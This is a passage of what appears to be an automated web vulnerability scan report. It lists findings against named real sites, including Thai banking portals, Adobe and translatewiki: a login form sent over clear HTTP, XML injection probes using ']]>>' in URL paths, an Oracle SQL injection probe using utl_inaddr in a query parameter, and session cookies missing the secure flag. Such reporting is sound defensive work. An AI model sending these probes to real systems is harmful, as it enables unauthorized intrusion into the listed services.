Set-Cookie: bblastvisit=1304429734; expires=Wed, 02 May 2012 13:35:34 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 02 May 2012 13:35:34 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=383">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.17. http://www.yestheyrefake.net/vb/showthread.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yestheyrefake.net
Path:   /vb/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /vb/showthread.php HTTP/1.1
Host: www.yestheyrefake.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:33 GMT
Server: Apache
Cache-Control: private
Pragma: private
X-Powered-By: PHP/4.4.9
X-UA-Compatible: IE=7
Set-Cookie: bblastvisit=1304429733; expires=Wed, 02 May 2012 13:35:33 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 02 May 2012 13:35:33 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=383">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

9. XML injection  previous  next
There are 14 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


9.1. http://get.adobe.com/flashplayer/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://get.adobe.com
Path:   /flashplayer/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flashplayer]]>>/ HTTP/1.1
Host: get.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:23:06 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Thu, 25-Apr-2041 13:23:06 GMT;path=/cfusion/
Connection: close
Vary: Accept-Encoding, User-Agent


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/x
...[SNIP]...

9.2. http://home.controlcase.com/piwik/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://home.controlcase.com
Path:   /piwik/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik]]>>/ HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 13:23:14 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1062

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.3. http://home.controlcase.com/piwik/piwik.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://home.controlcase.com
Path:   /piwik/piwik.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik]]>>/piwik.js HTTP/1.1
Host: home.controlcase.com
Proxy-Connection: keep-alive
Referer: http://www.controlcase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 13:17:37 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1048

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.4. http://home.controlcase.com/piwik/piwik.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://home.controlcase.com
Path:   /piwik/piwik.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik/piwik.js]]>> HTTP/1.1
Host: home.controlcase.com
Proxy-Connection: keep-alive
Referer: http://www.controlcase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 13:17:41 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1048

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.5. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://home.controlcase.com
Path:   /piwik/piwik.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik]]>>/piwik.php HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 13:22:54 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1048

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.6. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://home.controlcase.com
Path:   /piwik/piwik.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik/piwik.php]]>> HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 13:22:59 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1048

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.7. https://home.controlcase.com/piwik/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://home.controlcase.com
Path:   /piwik/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik]]>>/ HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.0 403 Forbidden
Date: Tue, 03 May 2011 13:24:08 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.8. http://lvs.truehits.in.th/func/th_common_1.4.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://lvs.truehits.in.th
Path:   /func/th_common_1.4.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /func]]>>/th_common_1.4.js HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 03 May 2011 13:17:00 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.9. http://lvs.truehits.in.th/func/th_common_1.4.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://lvs.truehits.in.th
Path:   /func/th_common_1.4.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /func/th_common_1.4.js]]>> HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 03 May 2011 13:17:19 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.10. http://lvs.truehits.in.th/func/th_donate_1.8.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://lvs.truehits.in.th
Path:   /func/th_donate_1.8.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /func]]>>/th_donate_1.8.js HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 03 May 2011 13:18:03 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.11. http://lvs.truehits.in.th/func/th_donate_1.8.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://lvs.truehits.in.th
Path:   /func/th_donate_1.8.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /func/th_donate_1.8.js]]>> HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 03 May 2011 13:18:20 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.12. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://translatewiki.net
Path:   /wiki/MediaWiki:Collapsible-collapse/en

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /wiki]]>>/MediaWiki:Collapsible-collapse/en HTTP/1.1
Host: translatewiki.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 03 May 2011 13:29:21 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.13. http://translatewiki.net/wiki/MediaWiki:Collapsible-expand/en [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://translatewiki.net
Path:   /wiki/MediaWiki:Collapsible-expand/en

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /wiki]]>>/MediaWiki:Collapsible-expand/en HTTP/1.1
Host: translatewiki.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 03 May 2011 13:29:20 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.14. http://www.controlcase.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.controlcase.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: www.controlcase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.456c=a61059e51c4888a1.1304435948.1.1304435948.1304435948; _pk_ses.3.456c=*; __utma=208121856.1998732058.1303664485.1303664485.1304435950.2; __utmc=208121856; __utmb=208121856.1.10.1304435950

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:20:14 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /index.asp?FileName=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&1=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: moneytalk.scb.co.th
Cookie: ASPSESSIONIDQSSRQSAA=AAHFIDBAOMBBNCPFOGLKKDHF
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:05:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22192
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="C
...[SNIP]...

11. SSL cookie without secure flag set  previous  next
There are 23 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


11.1. https://bizibanking.bangkokbank.com/bblamsui/SignOn.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://bizibanking.bangkokbank.com
Path:   /bblamsui/SignOn.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bblamsui/SignOn.aspx HTTP/1.1
Host: bizibanking.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 7464
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vobitvnuav3chg55kfny2p45; path=/; HttpOnly
Set-Cookie: PreferredCulture=en; path=/
Date: Tue, 03 May 2011 19:33:06 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>:: Biz iBanking ::</title>
       <LINK href="/bblamsui/inc/style_logon.css" type="text/css" rel="stylesheet">
...[SNIP]...

11.2. https://icustody.bangkokbank.com/Signon.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://icustody.bangkokbank.com
Path:   /Signon.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Signon.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: icustody.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9037
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=aclvmlauo12lpz550gbait45WTLOatnbmQwqJ+vmLol1xkpu6hw=; path=/
Date: Tue, 03 May 2011 19:35:00 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>SignOn</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="C#"
...[SNIP]...

11.3. https://ifunds.bangkokbank.com/Login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ifunds.bangkokbank.com
Path:   /Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: ifunds.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 11188
Content-Type: text/html; charset=windows-874
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=yrla5afsutwfsv45nwjra145; path=/
Date: Tue, 03 May 2011 19:34:32 GMT


<HTML>
   <HEAD>
       <title>Bualuang iFunds</title>
       <META http-equiv="Content-Type" content="text/html; charset=windows-874">
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/i
...[SNIP]...

